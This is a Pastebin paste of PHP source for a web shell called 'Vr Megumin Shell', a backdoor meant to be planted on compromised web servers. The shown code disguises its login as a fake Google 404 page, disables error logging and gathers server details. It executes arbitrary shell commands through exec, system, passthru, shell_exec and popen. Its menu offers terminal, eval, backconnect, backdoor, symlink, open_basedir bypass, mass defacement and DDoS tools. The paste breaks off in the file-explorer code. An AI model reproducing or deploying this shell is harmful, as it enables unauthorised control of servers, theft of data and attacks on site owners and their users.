SHARE
TWEET

ss

a guest Mar 17th, 2018 61 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. /*
  4.  
  5. Coded By Itsuka VrCy ~ IndoXploit Magelang
  6.  _   _______   ______   _    _   _    _    ____
  7. | | |__   __| |  ____| | |  | | | |  / |  / /\ \  
  8. | |    | |    |____ \  | |  | | | |_/ /  | |__| |
  9. | |    | |     ____| | | |__| | |  _ \_  |  __  |
  10. |_|    |_|    |______| |______| | | \__| |_|  |_| Vr Shell BY. Itsuka VrCy
  11. */
  12. $auth_pass = "vrcyber"; // Put your password here.
  13. @session_start();
  14. function Login() {
  15.     die("<title>Error 404 (Not Found)!!1</title>
  16.   <style>
  17.     *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(data:image/png;base64,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) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
  18.   </style>
  19.   <a href=//www.google.com/><span id=logo aria-label=Google></span></a>
  20.   <p><b>404.</b> <ins>That’s an error.</ins>
  21.   <p>The requested URL <code>/vr.php</code> was not found on this server.  <ins>That’s all we know.</ins>
  22.     <style>
  23.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  24.     </style>
  25.     <pre align=center>
  26.     <form method=post>
  27.     <input type=password name=pass>
  28.     </form></pre>");
  29. }
  30. if(!isset($_SESSION[$_SERVER['HTTP_HOST']]))
  31.     if( empty($auth_pass) || ( isset($_POST['pass']) && ($_POST['pass'] == $auth_pass) ) )
  32.         $_SESSION[$_SERVER['HTTP_HOST']] = true;
  33.     else
  34.         Login();
  35. $db = "";
  36. ob_start();
  37. if(!isset($_GET['action']) or $_GET['action']==""){
  38.    
  39.    
  40.     header("location: ?action=explorer");
  41.    
  42.    
  43. }
  44. if(isset($_GET["hiddenshell"])){
  45.  
  46. exit;}
  47. @ini_set('error_log',NULL);
  48. @ini_set('log_errors',0);
  49. @ini_set('max_execution_time',0);
  50. @set_time_limit(0);
  51. @set_magic_quotes_runtime(0);
  52. if(get_magic_quotes_gpc()) {
  53.     function mstripslashes($array) {
  54.         return is_array($array) ? array_map('mstripslashes', $array) : stripslashes($array);
  55.     }
  56.     $_POST = mstripslashes($_POST);
  57. }
  58.  
  59. if(ini_get("safe_mode")=="1"){
  60.     $safemode="<font>ON</font>";
  61. } else{
  62.     $safemode="<font>OFF</font>";
  63. }
  64. if(ini_get("disable_functions")==""){
  65.     $disable_functions="<font>NONE</font>";
  66. } else{
  67.     $disable_functions=ini_get("disable_functions");
  68. }
  69. if(!function_exists('posix_getegid'))
  70. {
  71. $gid = @getmygid();
  72. $group = "?";
  73. } else
  74. {
  75. $uid = @posix_getpwuid(posix_geteuid());
  76. $gid = @posix_getgrgid(posix_getegid());
  77. $group = $gid['name'];
  78. $gid = $gid['gid'];
  79. }
  80.  
  81. //Start
  82.  
  83. $on="<font> ON </font>";
  84. $of="<font> OFF </font>";
  85. $none="<font> NONE </font>";
  86. if(function_exists('curl_version'))
  87. $curl=$on;
  88. else
  89. $curl=$of;
  90. if(function_exists('mysql_get_client_info'))
  91. $mysql=$on;
  92. else
  93. $mysql=$of;
  94. if(function_exists('mssql_connect'))
  95. $mssql=$on;
  96. else
  97. $mssql=$of;
  98. if(function_exists('pg_connect'))
  99. $pg=$on;
  100. else
  101. $pg=$of;
  102. if(function_exists('oci_connect'))
  103. $or=$on;
  104. else
  105. $or=$of;
  106. if(@ini_get('open_basedir'))
  107. $open_b=@ini_get('open_basedir');
  108. else
  109. $open_b=$none;
  110.  
  111. //End
  112.  
  113. function magicboom($text){
  114.     if (!get_magic_quotes_gpc()){
  115.         return $text;
  116.         }
  117.     return stripslashes($text);
  118.     }
  119.  
  120. function perms($p) {
  121. if (($p & 0xC000) == 0xC000)$i = 's';
  122. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  123. elseif (($p & 0x8000) == 0x8000)$i = '-';
  124. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  125. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  126. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  127. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  128. else $i = 'u';
  129. $i .= (($p & 0x0100) ? 'r' : '-');
  130. $i .= (($p & 0x0080) ? 'w' : '-');
  131. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  132. $i .= (($p & 0x0020) ? 'r' : '-');
  133. $i .= (($p & 0x0010) ? 'w' : '-');
  134. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  135. $i .= (($p & 0x0004) ? 'r' : '-');
  136. $i .= (($p & 0x0002) ? 'w' : '-');
  137. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  138. return $i;
  139. }
  140. function permsColor($f) {
  141.     if (!@is_readable($f))
  142.         return '<font color=#FF0000>' . perms(@fileperms($f)) . '</font>';
  143.     elseif (!@is_writable($f))
  144.         return '<font color=white>' . perms(@fileperms($f)) . '</font>';
  145.     else
  146.         return '<font color=#25ff00>' . perms(@fileperms($f)) . '</font>';
  147. }
  148. function size($s) {
  149. if($s >= 1073741824)
  150. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  151. elseif($s >= 1048576)
  152. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  153. elseif($s >= 1024)
  154. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  155. else
  156. return $s . ' B';
  157. }
  158. function extension($in) {
  159. $out = '';
  160. if (function_exists('exec')) {
  161. @exec($in,$out);
  162. $out = @join("\n",$out);
  163. } elseif (function_exists('passthru')) {
  164. ob_start();
  165. @passthru($in);
  166. $out = ob_get_clean();
  167. } elseif (function_exists('system')) {
  168. ob_start();
  169. @system($in);
  170. $out = ob_get_clean();
  171. } elseif (function_exists('shell_exec')) {
  172. $out = shell_exec($in);
  173. } elseif (is_resource($f = @popen($in,"r"))) {
  174. $out = "";
  175. while(!@feof($f))
  176. $out .= fread($f,1024);
  177. pclose($f);
  178. }
  179. return $out;
  180. }
  181. if (strtolower(substr(PHP_OS,0,3))=="win")
  182. $sys='win';
  183. else
  184. $sys='unix';
  185. $home_path = @getcwd();
  186. $path = @getcwd();
  187.  
  188. if(empty($_GET['dir'])){
  189.    
  190. $path=(dirname($_SERVER['SCRIPT_FILENAME']));
  191. } else{
  192.     $path=(htmlspecialchars($_GET['dir']));
  193. }
  194. if($sys == 'win')
  195. {
  196. $home_path = str_replace("\\", "/", $home_path);
  197. $path = str_replace("\\", "/", $path);
  198. }
  199.  
  200. if($path[strlen($path)-1] != '/' )
  201. $path .= '/';
  202. $cwd_links = '';
  203. $path1 = explode("/", $GLOBALS['path']);
  204. $n=count($path1);
  205. for($i=0; $i<$n-1; $i++) {
  206. $cwd_links .= "<a href='?action=explorer&dir=";
  207. for($j=0; $j<=$i; $j++)
  208. $cwd_links .= $path1[$j].'/';
  209. $cwd_links .= "'>".$path1[$i]."/</a>";
  210. }
  211.  
  212. $drives = "";
  213.  
  214. if (class_exists('COM')) {
  215.  
  216. foreach(range('C','Z') as $drive) {
  217. if(is_dir($drive.':\\')){
  218. $fso = new COM('Scripting.FileSystemObject');
  219. $D = $fso->Drives;
  220. $Dr = $fso->GetDrive($drive);
  221. if ($Dr->IsReady ) {
  222. $drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ '.$drive.' ]</a> ';
  223. }
  224. else {
  225. $drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ CD-Rom :  '.$drive.'  ]</a> ';
  226. }
  227. }
  228. }  
  229.  
  230. }
  231.  
  232. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
  233. function posix_getpwuid($p) {return false;} }
  234. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
  235. function posix_getgrgid($p) {return false;} }
  236. ?>
  237. <!DOCTYPE HTML>
  238. <html>
  239.     <head>
  240.         <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  241.         <link href="http://ashiyane.org/aboutus/images/logo2.png" rel="icon" type="image/x-icon"/>
  242.         <title><?php echo $_SERVER['HTTP_HOST']; ?> - Vr Shell</title>
  243. <style>
  244. body
  245. {
  246.     background:#1d1c1c;
  247.     color:#e3e3e3;
  248.     font-family:Tahoma;
  249. }
  250. h1,h2,h3,h4,h5,h6
  251. {
  252.     margin:0px;
  253.     padding:0px;
  254. }
  255. a
  256. {
  257.     text-decoration: none;
  258.     color:inherit;
  259. }
  260. li
  261. {
  262.     list-style:none;
  263. }
  264. ul
  265. {
  266.     padding:0px ;
  267.     margin:0px auto;
  268. }
  269. textarea{
  270.     border:2px solid #CE3F3F;
  271. }
  272. #hover tr:hover{
  273.             background-color:#CE3F3F;
  274. }
  275. .logo
  276. {
  277.     background-image:url('http://ashiyane.org/aboutus/images/logo2.png');
  278.     width:182px;
  279.     height:134px;
  280.     float:left;
  281. }
  282. .main
  283. {
  284.     width:90%;
  285.     margin:0px auto;
  286.     padding:0px;
  287. }
  288. .logout
  289. {
  290.     float:right;
  291.     background:#990000;
  292.     color:#FFF;
  293.     background-image:url('http://up.ashiyane.org/images/b5crr7rhrwc5e97nvgxq.png');
  294.     padding:5px;
  295.     padding-left:20px;
  296.     background-position:2px;
  297.     background-repeat: no-repeat;
  298.    
  299. }
  300. .description
  301. {
  302.     width: 70%;
  303.     float: left;
  304.     margin-left:20px;
  305.     margin-top:10px;
  306. }
  307. .description span
  308. {
  309.     font-size:12px;
  310. }
  311. .description span b
  312. {
  313.     color:#DD4242;
  314. }
  315. .header
  316. {
  317.       width: 95%;
  318.   margin-left: auto;
  319.   margin-right: auto;
  320. }
  321. .header h1
  322. {
  323.      padding: 0px;
  324.   margin: 0px;
  325.   text-align: center;
  326.   border-bottom: 3px solid #A81F1F;
  327. }
  328. .clear
  329. {
  330.     clear: both;
  331. }
  332.  
  333. .menu
  334. {
  335.    
  336.     margin-top:10px;
  337. }
  338. .menu ul
  339. {
  340.    
  341.     width:95%;
  342.     margin-left:3%;
  343.    
  344.    
  345. }
  346. .menu ul li:last-child
  347. {
  348.     border-right:none;
  349. }
  350. .menu ul li
  351. {
  352.     border-top: 3px solid #A81F1F;
  353.     background-color:#ce3f3f;
  354.     text-align:center;
  355.     float:left;
  356.     border-right:3px solid #a81f1f;
  357.     padding:10px 0px;
  358.     width:8%;
  359.     font-size:12px;
  360.    
  361. }
  362. .content-box
  363. {
  364.     font-size:13px;
  365.     background-color:#2D2D2D;
  366.     margin-top:10px;
  367.     width:94%;
  368.     margin-left:auto;
  369.     margin-right:auto;
  370. }
  371. .box-main-box
  372. {
  373.     padding:10px;
  374.     overflow-x:hidden;
  375. }
  376. .content-box table
  377. {
  378.     text-align: left;
  379. }
  380. .content-box table tr th
  381. {
  382.     color:#BE5757;  
  383. }
  384. .content-box table tr:nth-child(2n)
  385. {
  386.     background-color:#464444;
  387. }
  388. .box-box
  389. {
  390.     float:left;
  391.    
  392.     width:45%;
  393.     margin-top:10px;
  394.     padding:5px;
  395. }
  396. .box-box .title
  397. {
  398.     color:#BE5757;
  399.     border-bottom:2px solid #BE5757;
  400.     padding-bottom:3px;
  401.     float:left;
  402.     margin-bottom: 10px;
  403. }
  404. input[type="file"],input[type=text]
  405. {
  406.     border-radius: 3px;
  407.     padding:2px;
  408.     color: black;
  409. }
  410.  
  411. input[type=submit],input[type=reset]
  412. {
  413.     background-color: #E44242;
  414.     color: #FFF;
  415.     border: none;
  416.     padding: 5px;
  417.     border-radius: 3px;
  418.     margin-left:5px;
  419.     cursor: pointer;
  420. }
  421. input[type=button] {
  422.             background-color: #E44242;
  423.             color: #FFF;
  424.             border: none;
  425.             padding: 5px;
  426.             border-radius: 3px;
  427.             margin-left:5px;
  428.     cursor: pointer;
  429.  }
  430. .info-file-info li
  431. {
  432.     background:rgb(152, 134, 109);
  433.     float:left;
  434.     margin-right:10px;
  435.     padding:5px;
  436.     margin-top:10px;
  437. }
  438. .info-file-info li.active
  439. {
  440.     background:rgb(163, 95, 95);
  441. }
  442. .syms td{
  443. border:1px solid #A81F1F;
  444. }
  445. .syms tr:hover{
  446. background: #646464;
  447. }
  448. textarea{
  449. padding:10px 10px;
  450. background-color:#ddd;
  451. }
  452. .backdoor li{
  453.     background-color: #CE3F3F;
  454.     text-align: center;
  455.     border: 1px solid #A81F1F;
  456.     padding: 10px 0px;
  457.     font-size: 12px;
  458. }
  459. .backdoor a li{
  460.     color:white;
  461. }
  462. .backdoor li{
  463.     color:black;
  464. }
  465. </style>
  466.  
  467.     </head>
  468.     <body>
  469.         <div class="main">
  470.             <div class="header">
  471.     <h1>Vr Megumin Shell<span style="font-size: 12px; color: #CE3F3F;">By Itsuka VrCy</span></h1>
  472.     <div class="logo"></div>
  473.    
  474.     <div class="description">
  475.         <span style=""><b>Server IP : </b> <?php echo $_SERVER['SERVER_ADDR']; ?></span>
  476.         <span style=""><b>Your IP : </b> <?php echo $_SERVER['REMOTE_ADDR']; ?></span><br>
  477.         <span style=""><b>System : </b> <?php echo php_uname(); ?></span><br>
  478.         <span style=""><b>Software : </b> <?php echo getenv("SERVER_SOFTWARE"); ?></span>
  479.         <span style=""><b>User: </b><?php echo get_current_user()." "; ?></span><span>Group: <?php echo $gid ." [ $group ] ";?></span><br />
  480.         <span style=""><b>Safemode : </b><?php echo $safemode; ?></span>
  481.         <span style=""><b>Disable_Functions: </b><?php echo $disable_functions; ?></span><br />
  482.         <span><b>Open_Basedir : </b><?php echo $open_b;?></span><BR />
  483.         <span><b>CURL:</b><?php echo $curl; ?><span><b>MySQL:</b></span><?php echo $mysql; ?><span><b>MsSQL:</b></span><?php echo $mssql; ?><span><b>PostgreSQL:</b></span><?php echo $pg?><span><b>Oracle:</b></span><?php echo $or?></span><br />
  484.         <span><b>Domains:</b></span>
  485.         <?php
  486.         if($GLOBALS['sys']=='unix')
  487.         {
  488.             $d0mains = @file("/etc/named.conf");
  489.             if(!$d0mains)
  490.             {
  491.                 echo "<span>CANT READ named.conf</span>";
  492.             }
  493.             else
  494.             {
  495.                 $count;
  496.                 foreach($d0mains as $d0main)
  497.                 {
  498.                     if(@ereg("zone",$d0main))
  499.                     {
  500.                         preg_match_all('#zone "(.*)"#', $d0main, $domains);
  501.                         flush();
  502.                         if(strlen(trim($domains[1][0])) > 2){
  503.                             flush();
  504.                             $count++;
  505.                         }
  506.                     }
  507.                 }
  508.                 echo "<span>$count Domains</span>";
  509.             }
  510.         }
  511.         else{ echo"<span>CANT READ |Windows|</span>";}
  512.         ?>
  513.         <br />
  514.         <?php
  515.         echo '<tr>
  516. <td height="12"><span><b>Path:</b></span></td>
  517. <td colspan="2"><span>'.$cwd_links.' <a href="?action=explorer&dir='.$GLOBALS['home_path'].'"><font color=#DD4242 >| Home Directory |</font></a></span></td>
  518. </tr>';
  519.         ?><br />
  520.         <span style=""><?php echo $drives; ?></span><br />
  521.         <br />
  522.     </div>
  523.     <div class="logout"><a href="?action=logout">Logout</a></div>
  524.     <div class="clear"></div>
  525.    
  526. </div>
  527. <div class="menu">
  528.         <ul>
  529.             <li id="explorer"><a href="?action=explorer&dir=<?php echo $path ?>">HOME</a></li>
  530.             <li id="terminal"><a href="?action=terminal&dir=<?php echo $path ?>">TERMINAL</a></li>
  531.             <li id="eval"><a href="?action=eval&dir=<?php echo $path ?>">EVAL</a></li>
  532.             <li id="sym"><a href="?action=sym&dir=<?php echo $path ?>">SYMLINKER</a></li>
  533.             <li id="basedir"><a href="?action=basedir&dir=<?php echo $path ?>">OPEN BASEDIR</a></li>
  534.             <li id="sql"><a href="?action=sql&dir=<?php echo $path ?>">SQL</a></li>
  535.             <li id="cgiashiyane"><a href="?action=cgiashiyane&dir=<?php echo $path ?>">CGI-TELNET</a></li>
  536.             <li id="bc"><a href="?action=bc&dir=<?php echo $path ?>">BACKCONNECT</a></li>
  537.             <li id="backdoor"><a href="?action=backdoor&dir=<?php echo $path ?>">BACKDOOR</a></li>
  538.             <li id="othertools"><a href="?action=othertools&dir=<?php echo $path ?>" title="Other Tools:
  539.             Zone-h Mass Deface Poster
  540.             Ddoser
  541.             SQLi Target Finder
  542.             Mass Defacer
  543.             Zipper
  544.             Fake Mail
  545.             PHP To XML
  546.             Bypass Disable Functions
  547.             Hash Cracker
  548.             PHP Info">OTHER TOOLS</a></li>
  549.             <li id="aboutus"><a href="?action=aboutus&dir=">ABOUTUS</a></li>
  550.             <li id="rmshell"><a href="?action=rmshell">REMOVE</a></li>
  551.         </ul>
  552.     </div>
  553.  
  554.             <div class="clear"></div>
  555.             <div class="content-box">
  556.                 <div class="box-main-box">
  557. <?php
  558.  
  559. if(isset($_GET['action'])){
  560.    
  561.     $action=htmlspecialchars($_GET['action']);
  562.    
  563.     if($action=="explorer"){
  564.        
  565.         if(!function_exists("scandir")) {
  566.     function scandir($dir) {
  567.         $dh = opendir($dir);
  568.         while (false !== ($filename = readdir($dh)))
  569.             $files[] = $filename;
  570.         return $files;
  571.     }
  572. }
  573.        
  574.         echo "<style>#explorer{background: #A81F1F}</style>";
  575.         ?>
  576.         <br />
  577.         <div class="explorer">
  578.         <?php
  579.  
  580.         $files = scandir($path);
  581.         ?>
  582.         <table id="hover">
  583.        <th style="min-width:300px;">Name</th><th style="width:150px;">Size</th><th style="min-width:300px;">Modify</th><th style="width:300px;">Owner/Group<th style="width:150px;">Permission</th><th colspan=4>Actions</th>
  584.         <?php
  585.         $directories = array();
  586.         $files_list  = array();
  587.            
  588.         foreach($files as $entry){
  589.                 $entry_link=$path.$entry;
  590.                 $entry_link= ($entry_link);
  591.             if(!is_file($entry_link)){
  592.                 $directories[]  = $entry;
  593.  
  594.                
  595.             } else {
  596.                 $files_list[]    = $entry;
  597.  
  598.             }
  599.            
  600.         }
  601.        
  602.        
  603.             ?>
  604.                
  605.            
  606.             <?php
  607.                 foreach($directories as $directory){
  608.                 $entry_link=$path.$directory;
  609.                 $entry_link= ($entry_link);
  610.                     if($directory==".."){
  611.                         ?>
  612.                         <tr><td style="min-width:300px;"><?php
